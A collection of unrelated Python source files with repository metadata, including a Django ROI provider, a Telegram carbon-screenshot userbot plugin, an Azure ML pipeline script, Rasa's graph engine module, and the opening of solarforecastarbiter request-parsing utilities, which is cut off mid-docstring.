corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
from core.entity.entity_providers.model_providers.model_provider import ModelProvider
from imaging.entity.map.map_provider import MapProvider
class RectangularRoiProvider(ModelProvider):
"""
Exchanges information between the Django model layer and the RectangularRoi entity.
"""
_entity_model = "roi.models.RectangularRoi"
_lookup_field = "id"
_model_fields = ["left", "right", "top", "bottom"]
_entity_class = "roi.entity.RectangularRoi"
_map_provider = MapProvider()
def unwrap_entity(self, rectangular_roi):
"""
Converts the RectangularRoi entity to the Django model. Such a model could be saved to the database.
:param rectangular_roi: the entity to be converted
:return: the Django model
"""
roi_model = super().unwrap_entity(rectangular_roi)
roi_model.map_id = rectangular_roi._map.id
return roi_model
def wrap_entity(self, external_object):
"""
Converts external object to the rectangular ROI entity
:param external_object: some object containing information loaded from the database
:return: the RectangularRoi instance
"""
rect_roi = super().wrap_entity(external_object)
rect_roi._map = self._map_provider.wrap_entity(external_object.map)
return rect_roi
| 32
| 108
| 0.704613
|
fb0b0e74eff6cc09fb644379c76141501b2d86a5
| 2,881
|
py
|
Python
|
stdplugins/karbon3.py
|
sharath-git1/mybothubbot
|
1c78c0dfdf38ae7ae52d5fabdfadd69e184af66d
|
[
"Apache-2.0"
] | 1
|
2020-04-18T13:42:34.000Z
|
2020-04-18T13:42:34.000Z
|
stdplugins/karbon3.py
|
sharath-git1/mybothubbot
|
1c78c0dfdf38ae7ae52d5fabdfadd69e184af66d
|
[
"Apache-2.0"
] | 1
|
2021-02-08T20:44:42.000Z
|
2021-02-08T20:44:42.000Z
|
stdplugins/karbon3.py
|
hansari97/Tg-Bot
|
8fdf535c8df2c73d2ba762bc61464f106dc8f549
|
[
"Apache-2.0"
] | null | null | null |
"""Carbon Scraper Plugin for Userbot. //text in creative way.
usage: .kar3 //as a reply to any text message
Thanks to @r4v4n4 for vars"""
from selenium.webdriver.support.ui import Select
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
from telethon import events
from urllib.parse import quote_plus
from urllib.error import HTTPError
from time import sleep
import asyncio
import os
@borg.on(events.NewMessage(pattern=r"\.kar3", outgoing=True))
async def carbon_api(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
""" A Wrapper for carbon.now.sh """
await e.edit("🎛🎛🎛🎛🎛")
CARBON = 'https://carbon.now.sh/?bg=rgba(74%2C144%2C226%2C1)&t=material&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}'
CARBONLANG = "en"
textx = await e.get_reply_message()
pcode = e.text
if pcode[8:]:
pcode = str(pcode[8:])
elif textx:
pcode = str(textx.message) # Importing message to module
code = quote_plus(pcode) # Converting to urlencoded
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CARBON_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument('--disable-gpu')
prefs = {'download.default_directory' : './'}
chrome_options.add_experimental_option('prefs', prefs)
await e.edit("🔵🔵🎛🎛🎛")
driver = webdriver.Chrome(executable_path=Config.CARBON_DRIVER, options=chrome_options)
driver.get(url)
download_path = './'
driver.command_executor._commands["send_command"] = ("POST", '/session/$sessionId/chromium/send_command')
params = {'cmd': 'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': download_path}}
command_result = driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
sleep(5) # this might take a bit.
driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
sleep(5)
await e.edit("🔵🔵🔵🎛🎛")
driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
sleep(5) #Waiting for downloading
await e.edit("🔵🔵🔵🔵🔵")
file = './carbon.png'
await e.edit("⬆️Karbon3 Completed, Uploading Karbon⬆️")
await e.client.send_file(
e.chat_id,
file,
caption="Karbon3 by [@PhycoNinja13b](https://github.com/Phyco-Ninja/UniNinja)",
force_document=True,
reply_to=e.message.reply_to_msg_id,
)
os.remove('./carbon.png')
# Removing carbon.png after uploading
await e.delete() # Deleting msg
| 40.577465
| 238
| 0.695939
|
f4f096759ff7faf205826e5b94fd8a4964d7c718
| 6,234
|
py
|
Python
|
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | 1
|
2022-03-28T17:31:02.000Z
|
2022-03-28T17:31:02.000Z
|
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | null | null | null |
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | null | null | null |
from azureml.pipeline.core.graph import PipelineParameter
from azureml.pipeline.steps import PythonScriptStep
from azureml.pipeline.core import Pipeline, PipelineData
from azureml.core import Workspace, Dataset, Datastore
from azureml.core.runconfig import RunConfiguration
from ml_service.pipelines.load_sample_data import create_sample_data_csv
from ml_service.util.attach_compute import get_compute
from ml_service.util.env_variables import Env
from ml_service.util.manage_environment import get_environment
import os
def main():
e = Env()
# Get Azure machine learning workspace
aml_workspace = Workspace.get(
name=e.workspace_name,
subscription_id=e.subscription_id,
resource_group=e.resource_group,
)
print("get_workspace:")
print(aml_workspace)
# Get Azure machine learning cluster
aml_compute = get_compute(aml_workspace, e.compute_name, e.vm_size)
if aml_compute is not None:
print("aml_compute:")
print(aml_compute)
# Create a reusable Azure ML environment
environment = get_environment(
aml_workspace,
e.aml_env_name,
conda_dependencies_file=e.aml_env_train_conda_dep_file,
create_new=e.rebuild_env,
) #
run_config = RunConfiguration()
run_config.environment = environment
if e.datastore_name:
datastore_name = e.datastore_name
else:
datastore_name = aml_workspace.get_default_datastore().name
run_config.environment.environment_variables[
"DATASTORE_NAME"
] = datastore_name # NOQA: E501
model_name_param = PipelineParameter(name="model_name", default_value=e.model_name) # NOQA: E501
dataset_version_param = PipelineParameter(
name="dataset_version", default_value=e.dataset_version
)
data_file_path_param = PipelineParameter(
name="data_file_path", default_value="none"
)
caller_run_id_param = PipelineParameter(name="caller_run_id", default_value="none") # NOQA: E501
# Get dataset name
dataset_name = e.dataset_name
# Check to see if dataset exists
if dataset_name not in aml_workspace.datasets:
# This call creates an example CSV from sklearn sample data. If you
# have already bootstrapped your project, you can comment this line
# out and use your own CSV.
create_sample_data_csv()
# Use a CSV to read in the data set.
file_name = "titanic.csv"
if not os.path.exists(file_name):
raise Exception(
'Could not find CSV dataset at "%s". If you have bootstrapped your project, you will need to provide a CSV.' # NOQA: E501
% file_name
) # NOQA: E501
# Upload file to default datastore in workspace
datatstore = Datastore.get(aml_workspace, datastore_name)
target_path = "training-data/"
datatstore.upload_files(
files=[file_name],
target_path=target_path,
overwrite=True,
show_progress=False,
)
# Register dataset
path_on_datastore = os.path.join(target_path, file_name)
dataset = Dataset.Tabular.from_delimited_files(
path=(datatstore, path_on_datastore)
)
dataset = dataset.register(
workspace=aml_workspace,
name=dataset_name,
description="titanic training data",
tags={"format": "CSV"},
create_new_version=True,
)
# Create a PipelineData to pass data between steps
pipeline_data = PipelineData(
"pipeline_data", datastore=aml_workspace.get_default_datastore()
)
train_step = PythonScriptStep(
name="Train Model",
script_name=e.train_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
outputs=[pipeline_data],
arguments=[
"--model_name",
model_name_param,
"--step_output",
pipeline_data,
"--dataset_version",
dataset_version_param,
"--data_file_path",
data_file_path_param,
"--caller_run_id",
caller_run_id_param,
"--dataset_name",
dataset_name,
],
runconfig=run_config,
allow_reuse=True,
)
print("Step Train created")
evaluate_step = PythonScriptStep(
name="Evaluate Model ",
script_name=e.evaluate_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
arguments=[
"--model_name",
model_name_param,
"--allow_run_cancel",
e.allow_run_cancel,
],
runconfig=run_config,
allow_reuse=False,
)
print("Step Evaluate created")
register_step = PythonScriptStep(
name="Register Model ",
script_name=e.register_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
inputs=[pipeline_data],
arguments=["--model_name", model_name_param, "--step_input", pipeline_data, ], # NOQA: E501
runconfig=run_config,
allow_reuse=False,
)
print("Step Register created")
# Check run_evaluation flag to include or exclude evaluation step.
if (e.run_evaluation).lower() == "true":
print("Include evaluation step before register step.")
evaluate_step.run_after(train_step)
register_step.run_after(evaluate_step)
steps = [train_step, evaluate_step, register_step]
else:
print("Exclude evaluation step and directly run register step.")
register_step.run_after(train_step)
steps = [train_step, register_step]
train_pipeline = Pipeline(workspace=aml_workspace, steps=steps)
train_pipeline._set_experiment_name
train_pipeline.validate()
published_pipeline = train_pipeline.publish(
name=e.pipeline_name,
description="Model training/retraining pipeline",
version=e.build_id,
)
print(f"Published pipeline: {published_pipeline.name}")
print(f"for build {published_pipeline.version}")
if __name__ == "__main__":
main()
| 34.441989
| 138
| 0.665544
|
56a621c94f3ffef4d52910f2b0a75113269a1d83
| 1,119
|
py
|
Python
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 14
|
2015-03-31T16:30:51.000Z
|
2022-01-06T02:54:42.000Z
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 32
|
2015-01-14T01:46:29.000Z
|
2021-12-27T00:01:14.000Z
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 35
|
2015-03-04T04:33:01.000Z
|
2022-02-22T04:31:24.000Z
|
#
# Copyright (c) 2012 Testrepository Contributors
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
"""An Argument that gets the name of an existing path."""
import os.path
from testrepository.arguments import AbstractArgument
class ExistingPathArgument(AbstractArgument):
"""An argument that stores a string verbatim."""
def _parse_one(self, arg):
if arg == '--':
raise ValueError('-- is not a valid argument')
if not os.path.exists(arg):
raise ValueError('No such path %r' % (arg,))
return arg
| 36.096774
| 78
| 0.722967
|
f57dc0161bebf47a1b92fa2912a637ecbbe98751
| 50
|
py
|
Python
|
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
from .model import PANNsCNN14Att, PANNsResNet38Att
| 50
| 50
| 0.88
|
8c84ac9a422ed3a53f0c3391ff3abf831fb515d0
| 21,000
|
py
|
Python
|
rasa/engine/graph.py
|
dangnguyenngochai/rasa
|
538849e0eef0044c9f62799ce944cc54ad2d2c36
|
[
"Apache-2.0"
] | 1
|
2022-03-03T16:11:02.000Z
|
2022-03-03T16:11:02.000Z
|
rasa/engine/graph.py
|
dangnguyenngochai/rasa
|
538849e0eef0044c9f62799ce944cc54ad2d2c36
|
[
"Apache-2.0"
] | 250
|
2020-08-14T13:41:26.000Z
|
2022-03-28T12:10:13.000Z
|
rasa/engine/graph.py
|
goitf/rasa
|
0b87727fb40d22822ccf4539a34f0ab3c58e3c85
|
[
"Apache-2.0"
] | 1
|
2021-12-03T13:04:55.000Z
|
2021-12-03T13:04:55.000Z
|
from __future__ import annotations
import dataclasses
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
import logging
from typing import Any, Callable, Dict, List, Optional, Text, Type, Tuple
from rasa.engine.exceptions import (
GraphComponentException,
GraphSchemaException,
)
import rasa.shared.utils.common
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.shared.exceptions import InvalidConfigException, RasaException
from rasa.shared.importers.autoconfig import TrainingType
logger = logging.getLogger(__name__)
@dataclass
class SchemaNode:
"""Represents one node in the schema.
Args:
needs: describes which parameters in `fn` (or `constructor_name`
if `eager==False`) are filled by which parent nodes.
uses: The class which models the behavior of this specific graph node.
constructor_name: The name of the constructor which should be used to
instantiate the component. If `eager==False` then the `constructor` can
also specify parameters which are filled by parent nodes. This is e.g.
useful if a parent node returns a `Resource` and this node wants to
directly load itself from this resource.
fn: The name of the function which should be called on the instantiated
component when the graph is executed. The parameters from `needs` are
filled from the parent nodes.
config: The user's configuration for this graph node. This configuration
does not need to be specify all possible parameters; the default values
for missing parameters will be filled in later.
eager: If `eager` then the component is instantiated before the graph is run.
Otherwise it's instantiated as the graph runs (lazily). Usually we always
instantiated lazily during training and eagerly during inference (to
avoid that the first prediction takes longer).
is_target: If `True` then this node can't be pruned during fingerprinting
(it might be replaced with a cached value though). This is e.g. used for
all components which train as their result always needs to be added to
the model archive so that the data is available during inference.
is_input: Nodes with `is_input` are _always_ run (also during the fingerprint
run). This makes sure that we e.g. detect changes in file contents.
resource: If given, then the graph node is loaded from an existing resource
instead of instantiated from scratch. This is e.g. used to load a trained
component for predictions.
"""
needs: Dict[Text, Text]
uses: Type[GraphComponent]
constructor_name: Text
fn: Text
config: Dict[Text, Any]
eager: bool = False
is_target: bool = False
is_input: bool = False
resource: Optional[Resource] = None
@dataclass
class GraphSchema:
"""Represents a graph for training a model or making predictions."""
nodes: Dict[Text, SchemaNode]
def as_dict(self) -> Dict[Text, Any]:
"""Returns graph schema in a serializable format.
Returns:
The graph schema in a format which can be dumped as JSON or other formats.
"""
serializable_graph_schema = {"nodes": {}}
for node_name, node in self.nodes.items():
serializable = dataclasses.asdict(node)
# Classes are not JSON serializable (surprise)
serializable["uses"] = f"{node.uses.__module__}.{node.uses.__name__}"
serializable_graph_schema["nodes"][node_name] = serializable
return serializable_graph_schema
@classmethod
def from_dict(cls, serialized_graph_schema: Dict[Text, Any]) -> GraphSchema:
"""Loads a graph schema which has been serialized using `schema.as_dict()`.
Args:
serialized_graph_schema: A serialized graph schema.
Returns:
A properly loaded schema.
Raises:
GraphSchemaException: In case the component class for a node couldn't be
found.
"""
nodes = {}
for node_name, serialized_node in serialized_graph_schema["nodes"].items():
try:
serialized_node[
"uses"
] = rasa.shared.utils.common.class_from_module_path(
serialized_node["uses"]
)
resource = serialized_node["resource"]
if resource:
serialized_node["resource"] = Resource(**resource)
except ImportError as e:
raise GraphSchemaException(
"Error deserializing graph schema. Can't "
"find class for graph component type "
f"'{serialized_node['uses']}'."
) from e
nodes[node_name] = SchemaNode(**serialized_node)
return GraphSchema(nodes)
@property
def target_names(self) -> List[Text]:
"""Returns the names of all target nodes."""
return [node_name for node_name, node in self.nodes.items() if node.is_target]
def minimal_graph_schema(self, targets: Optional[List[Text]] = None) -> GraphSchema:
"""Returns a new schema where all nodes are a descendant of a target."""
dependencies = self._all_dependencies_schema(
targets if targets else self.target_names
)
return GraphSchema(
{
node_name: node
for node_name, node in self.nodes.items()
if node_name in dependencies
}
)
def _all_dependencies_schema(self, targets: List[Text]) -> List[Text]:
required = []
for target in targets:
required.append(target)
try:
target_dependencies = self.nodes[target].needs.values()
except KeyError: # This can happen if the target is an input placeholder.
continue
for dependency in target_dependencies:
required += self._all_dependencies_schema([dependency])
return required
class GraphComponent(ABC):
"""Interface for any component which will run in a graph."""
@classmethod
def required_components(cls) -> List[Type]:
"""Components that should be included in the pipeline before this component."""
return []
@classmethod
@abstractmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> GraphComponent:
"""Creates a new `GraphComponent`.
Args:
config: This config overrides the `default_config`.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: Resource locator for this component which can be used to persist
and load itself from the `model_storage`.
execution_context: Information about the current graph run.
Returns: An instantiated `GraphComponent`.
"""
...
@classmethod
def load(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
**kwargs: Any,
) -> GraphComponent:
"""Creates a component using a persisted version of itself.
If not overridden this method merely calls `create`.
Args:
config: The config for this graph component. This is the default config of
the component merged with config specified by the user.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: Resource locator for this component which can be used to persist
and load itself from the `model_storage`.
execution_context: Information about the current graph run.
kwargs: Output values from previous nodes might be passed in as `kwargs`.
Returns:
An instantiated, loaded `GraphComponent`.
"""
return cls.create(config, model_storage, resource, execution_context)
@staticmethod
def get_default_config() -> Dict[Text, Any]:
"""Returns the component's default config.
Default config and user config are merged by the `GraphNode` before the
config is passed to the `create` and `load` method of the component.
Returns:
The default config of the component.
"""
return {}
@staticmethod
def supported_languages() -> Optional[List[Text]]:
"""Determines which languages this component can work with.
Returns: A list of supported languages, or `None` to signify all are supported.
"""
return None
@staticmethod
def not_supported_languages() -> Optional[List[Text]]:
"""Determines which languages this component cannot work with.
Returns: A list of not supported languages, or
`None` to signify all are supported.
"""
return None
@staticmethod
def required_packages() -> List[Text]:
"""Any extra python dependencies required for this component to run."""
return []
class GraphNodeHook(ABC):
"""Holds functionality to be run before and after a `GraphNode`."""
@abstractmethod
def on_before_node(
self,
node_name: Text,
execution_context: ExecutionContext,
config: Dict[Text, Any],
received_inputs: Dict[Text, Any],
) -> Dict:
"""Runs before the `GraphNode` executes.
Args:
node_name: The name of the node being run.
execution_context: The execution context of the current graph run.
config: The node's config.
received_inputs: Mapping from parameter name to input value.
Returns:
Data that is then passed to `on_after_node`
"""
...
@abstractmethod
def on_after_node(
self,
node_name: Text,
execution_context: ExecutionContext,
config: Dict[Text, Any],
output: Any,
input_hook_data: Dict,
) -> None:
"""Runs after the `GraphNode` as executed.
Args:
node_name: The name of the node that has run.
execution_context: The execution context of the current graph run.
config: The node's config.
output: The output of the node.
input_hook_data: Data returned from `on_before_node`.
"""
...
@dataclass
class ExecutionContext:
"""Holds information about a single graph run."""
graph_schema: GraphSchema = field(repr=False)
model_id: Optional[Text] = None
should_add_diagnostic_data: bool = False
is_finetuning: bool = False
# This is set by the `GraphNode` before it is passed to the `GraphComponent`.
node_name: Optional[Text] = None
class GraphNode:
"""Instantiates and runs a `GraphComponent` within a graph.
A `GraphNode` is a wrapper for a `GraphComponent` that allows it to be executed
in the context of a graph. It is responsible for instantiating the component at the
correct time, collecting the inputs from the parent nodes, running the run function
of the component and passing the output onwards.
"""
def __init__(
self,
node_name: Text,
component_class: Type[GraphComponent],
constructor_name: Text,
component_config: Dict[Text, Any],
fn_name: Text,
inputs: Dict[Text, Text],
eager: bool,
model_storage: ModelStorage,
resource: Optional[Resource],
execution_context: ExecutionContext,
hooks: Optional[List[GraphNodeHook]] = None,
) -> None:
"""Initializes `GraphNode`.
Args:
node_name: The name of the node in the schema.
component_class: The class to be instantiated and run.
constructor_name: The method used to instantiate the component.
component_config: Config to be passed to the component.
fn_name: The function on the instantiated `GraphComponent` to be run when
the node executes.
inputs: A map from input name to parent node name that provides it.
eager: Determines if the node is instantiated right away, or just before
being run.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: If given the `GraphComponent` will be loaded from the
`model_storage` using the given resource.
execution_context: Information about the current graph run.
hooks: These are called before and after execution.
"""
self._node_name: Text = node_name
self._component_class: Type[GraphComponent] = component_class
self._constructor_name: Text = constructor_name
self._constructor_fn: Callable = getattr(
self._component_class, self._constructor_name
)
self._component_config: Dict[Text, Any] = {
**self._component_class.get_default_config(),
**component_config,
}
self._fn_name: Text = fn_name
self._fn: Callable = getattr(self._component_class, self._fn_name)
self._inputs: Dict[Text, Text] = inputs
self._eager: bool = eager
self._model_storage = model_storage
self._existing_resource = resource
self._execution_context: ExecutionContext = dataclasses.replace(
execution_context, node_name=self._node_name
)
self._hooks: List[GraphNodeHook] = hooks if hooks else []
self._component: Optional[GraphComponent] = None
if self._eager:
self._load_component()
def _load_component(self, **kwargs: Any) -> None:
logger.debug(
f"Node '{self._node_name}' loading "
f"'{self._component_class.__name__}.{self._constructor_name}' "
f"and kwargs: '{kwargs}'."
)
constructor = getattr(self._component_class, self._constructor_name)
try:
self._component: GraphComponent = constructor( # type: ignore[no-redef]
config=self._component_config,
model_storage=self._model_storage,
resource=self._get_resource(kwargs),
execution_context=self._execution_context,
**kwargs,
)
except InvalidConfigException:
# Pass through somewhat expected exception to allow more fine granular
# handling of exceptions.
raise
except Exception as e:
if not isinstance(e, RasaException):
raise GraphComponentException(
f"Error initializing graph component for node {self._node_name}."
) from e
else:
logger.error(
f"Error initializing graph component for node {self._node_name}."
)
raise
def _get_resource(self, kwargs: Dict[Text, Any]) -> Resource:
if "resource" in kwargs:
# A parent node provides resource during training. The component wrapped
# by this `GraphNode` will load itself from this resource.
return kwargs.pop("resource")
if self._existing_resource:
# The component should be loaded from a trained resource during inference.
# E.g. a classifier might train and persist itself during training and will
# then load itself from this resource during inference.
return self._existing_resource
# The component gets a chance to persist itself
return Resource(self._node_name)
def __call__(
self, *inputs_from_previous_nodes: Tuple[Text, Any]
) -> Tuple[Text, Any]:
"""Calls the `GraphComponent` run method when the node executes in the graph.
Args:
*inputs_from_previous_nodes: The output of all parent nodes. Each is a
dictionary with a single item mapping the node's name to its output.
Returns:
The node name and its output.
"""
received_inputs: Dict[Text, Any] = dict(inputs_from_previous_nodes)
kwargs = {}
for input_name, input_node in self._inputs.items():
kwargs[input_name] = received_inputs[input_node]
input_hook_outputs = self._run_before_hooks(kwargs)
if not self._eager:
constructor_kwargs = rasa.shared.utils.common.minimal_kwargs(
kwargs, self._constructor_fn
)
self._load_component(**constructor_kwargs)
run_kwargs = {
k: v for k, v in kwargs.items() if k not in constructor_kwargs
}
else:
run_kwargs = kwargs
logger.debug(
f"Node '{self._node_name}' running "
f"'{self._component_class.__name__}.{self._fn_name}'."
)
try:
output = self._fn(self._component, **run_kwargs)
except InvalidConfigException:
# Pass through somewhat expected exception to allow more fine granular
# handling of exceptions.
raise
except Exception as e:
if not isinstance(e, RasaException):
raise GraphComponentException(
f"Error running graph component for node {self._node_name}."
) from e
else:
logger.error(
f"Error running graph component for node {self._node_name}."
)
raise
self._run_after_hooks(input_hook_outputs, output)
return self._node_name, output
def _run_after_hooks(self, input_hook_outputs: List[Dict], output: Any) -> None:
for hook, hook_data in zip(self._hooks, input_hook_outputs):
try:
logger.debug(
f"Hook '{hook.__class__.__name__}.on_after_node' "
f"running for node '{self._node_name}'."
)
hook.on_after_node(
node_name=self._node_name,
execution_context=self._execution_context,
config=self._component_config,
output=output,
input_hook_data=hook_data,
)
except Exception as e:
raise GraphComponentException(
f"Error running after hook for node '{self._node_name}'."
) from e
def _run_before_hooks(self, received_inputs: Dict[Text, Any]) -> List[Dict]:
input_hook_outputs = []
for hook in self._hooks:
try:
logger.debug(
f"Hook '{hook.__class__.__name__}.on_before_node' "
f"running for node '{self._node_name}'."
)
hook_output = hook.on_before_node(
node_name=self._node_name,
execution_context=self._execution_context,
config=self._component_config,
received_inputs=received_inputs,
)
input_hook_outputs.append(hook_output)
except Exception as e:
raise GraphComponentException(
f"Error running before hook for node '{self._node_name}'."
) from e
return input_hook_outputs
@classmethod
def from_schema_node(
cls,
node_name: Text,
schema_node: SchemaNode,
model_storage: ModelStorage,
execution_context: ExecutionContext,
hooks: Optional[List[GraphNodeHook]] = None,
) -> GraphNode:
"""Creates a `GraphNode` from a `SchemaNode`."""
return cls(
node_name=node_name,
component_class=schema_node.uses,
constructor_name=schema_node.constructor_name,
component_config=schema_node.config,
fn_name=schema_node.fn,
inputs=schema_node.needs,
eager=schema_node.eager,
model_storage=model_storage,
execution_context=execution_context,
resource=schema_node.resource,
hooks=hooks,
)
@dataclass()
class GraphModelConfiguration:
"""The model configuration to run as a graph during training and prediction."""
train_schema: GraphSchema
predict_schema: GraphSchema
training_type: TrainingType
language: Optional[Text]
core_target: Optional[Text]
nlu_target: Optional[Text]
| 37.366548
| 88
| 0.619048
|
107168387754e1511c26a0a770806d3e86278691
| 16,951
|
py
|
Python
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 7
|
2018-12-07T22:05:36.000Z
|
2020-05-03T03:20:50.000Z
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 220
|
2018-11-01T23:33:19.000Z
|
2021-12-02T21:06:38.000Z
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 3
|
2018-10-31T20:55:07.000Z
|
2021-11-10T22:51:43.000Z
|
from collections import defaultdict
from io import StringIO
import json
import re
import string
from flask import request, current_app
import numpy as np
import pandas as pd
from solarforecastarbiter.datamodel import Forecast, Site
from solarforecastarbiter.reference_forecasts import utils as fx_utils
from werkzeug.exceptions import RequestEntityTooLarge
from sfa_api.utils.errors import (
BadAPIRequest, NotFoundException, StorageAuthError)
def validate_observation_values(observation_df, quality_flag_range=(0, 1)):
"""
Validate the columns of an observation value DataFrame.
Parameters
----------
observation_df : pandas.DataFrame
DataFrame to validate columns and values
quality_flag_range : tuple, default (0, 1)
Range of allowable quality_flag
Returns
-------
pandas.DataFrame
With types adjusted as appropriate
Raises
------
BadAPIRequest
For any errors in the columns or values
"""
errors = defaultdict(list)
try:
observation_df['value'] = pd.to_numeric(observation_df['value'],
downcast='float')
except ValueError:
errors['value'].append(
'Invalid item in "value" field. Ensure that all '
'values are integers, floats, empty, NaN, or NULL.')
except KeyError:
errors['value'].append('Missing "value" field.')
try:
observation_df['timestamp'] = pd.to_datetime(
observation_df['timestamp'],
utc=True)
except ValueError:
errors['timestamp'].append(
'Invalid item in "timestamp" field. Ensure '
'that timestamps are ISO8601 compliant')
except KeyError:
errors['timestamp'].append('Missing "timestamp" field.')
try:
observation_df['quality_flag'].astype(int)
except KeyError:
errors['quality_flag'].append('Missing "quality_flag" field.')
except (ValueError, TypeError):
errors['quality_flag'].append(
'Item in "quality_flag" field is not an integer.')
else:
if not np.isclose(
observation_df['quality_flag'].mod(1), 0, 1e-12).all():
errors['quality_flag'].append(
'Item in "quality_flag" field is not an integer.')
if not observation_df['quality_flag'].between(
*quality_flag_range).all():
errors['quality_flag'].append(
'Item in "quality_flag" field out of range '
f'{quality_flag_range}.')
if errors:
raise BadAPIRequest(errors)
return observation_df
def parse_csv(csv_string):
"""Parse a csv into a dataframe and raise appropriate errors
Parameters
----------
csv_string: str
String representation of csv to read into a dataframe
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequestError
If the string cannot be parsed.
"""
raw_data = StringIO(csv_string)
try:
value_df = pd.read_csv(raw_data,
na_values=[-999.0, -9999.0],
keep_default_na=True,
comment='#')
except (pd.errors.EmptyDataError, pd.errors.ParserError):
raise BadAPIRequest({'error': 'Malformed CSV'})
return value_df
def parse_json(json_str):
"""Parse a string of json values into a DataFrame
Parameters
----------
json_str: str
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequestError
If the 'values' key is missing, or if the contents of the
values key cannot be parsed into a DataFrame.
"""
try:
json_dict = json.loads(''.join(s for s in json_str
if s in string.printable))
except json.decoder.JSONDecodeError:
raise BadAPIRequest(error='Malformed JSON.')
try:
raw_values = json_dict['values']
except (TypeError, KeyError):
error = 'Supplied JSON does not contain "values" field.'
raise BadAPIRequest(error=error)
try:
value_df = pd.DataFrame(raw_values)
except ValueError:
raise BadAPIRequest({'error': 'Malformed JSON'})
return value_df
def parse_values(decoded_data, mimetype):
"""Attempts to parse a string of data into a DataFrame based on MIME type.
Parameters
----------
decoded_data: str
A string of data to parse.
mimetype: str
The MIME type of the data.
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequest
- If the MIME type is not one of 'text/csv', 'application/json',
or 'application/vnd.ms-excel'
- If parsing fails, see parse_json or parse_csv for conditions.
- If the file contains more than the maximum allowed number of
datapoints.
"""
if mimetype == 'text/csv' or mimetype == 'application/vnd.ms-excel':
values = parse_csv(decoded_data)
elif mimetype == 'application/json':
values = parse_json(decoded_data)
else:
error = "Unsupported Content-Type or MIME type."
raise BadAPIRequest(error=error)
if values.index.size > current_app.config.get('MAX_POST_DATAPOINTS'):
raise BadAPIRequest({
'error': ('File exceeds maximum number of datapoints. '
f'{current_app.config.get("MAX_POST_DATAPOINTS")} '
f'datapoints allowed, {values.index.size} datapoints '
'found in file.')
})
return values
def decode_file_in_request_body():
"""Decode the data from a utf-8 encoded file into a string and
return the contents and the file's mimetype.
Returns
-------
decoded_data: str
